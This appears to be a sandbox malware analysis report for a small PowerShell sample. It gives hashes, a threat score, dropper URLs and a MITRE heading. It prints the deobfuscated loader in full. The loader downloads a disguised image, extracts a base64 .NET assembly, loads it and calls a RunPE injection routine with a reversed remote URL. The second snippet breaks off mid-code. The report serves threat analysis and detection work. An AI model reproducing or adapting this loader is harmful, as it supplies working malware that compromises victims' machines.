General

  • Target

    2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e.unknown

  • Size

    1KB

  • Sample

    240704-bm7lzswfnm

  • MD5

    7c81cf8237e58f041ef1627eb04a2611

  • SHA1

    da3d8d66045d951a1c57f04316e3e27e450fd3f4

  • SHA256

    2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e

  • SHA512

    327e3792c508b69e7bf9e7b91bbae0591bcf2e3a0fed6065e02266f5fc63f08ab86576d72f9b1d17a0a886521cde2b32101f729f83be14cd374be062f93089c4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
"$link = 'https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.1etsap/mv1d1u2b/war/ved.edocetsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','')) } }"|invoke-expression

# powershell snippet 1
$link = "https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235"
$webclient = new-object system.net.webclient
try {
    $downloadeddata = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235")
} catch {
    write-host "Failed To download data from $link" -foregroundcolor red
    exit
}

if ($downloadeddata -ne $null) {
    $imagetext = ([system.text.encoding]::ascii).getstring($downloadeddata)
    $startflag = "<<BASE64_START>>"
    $endflag = "<<BASE64_END>>"
    $startindex = $imagetext.indexof("<<BASE64_START>>")
    $endindex = $imagetext.indexof("<<BASE64_END>>")
    if ($startindex -ge 0 -and $endindex -gt $startindex) {

URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235

exe.dropper

https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235

Targets

    • Target

      2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e.unknown

    • Size

      1KB

    • MD5

      7c81cf8237e58f041ef1627eb04a2611

    • SHA1

      da3d8d66045d951a1c57f04316e3e27e450fd3f4

    • SHA256

      2efb8e05f9b74fb551ceab2883a98e2e2300a4f29b050c0b747ba8250caf0c9e

    • SHA512

      327e3792c508b69e7bf9e7b91bbae0591bcf2e3a0fed6065e02266f5fc63f08ab86576d72f9b1d17a0a886521cde2b32101f729f83be14cd374be062f93089c4

    Score
    8/10
    • Blocklisted process makes network request

MITRE ATT&CK Enterprise v15

Tasks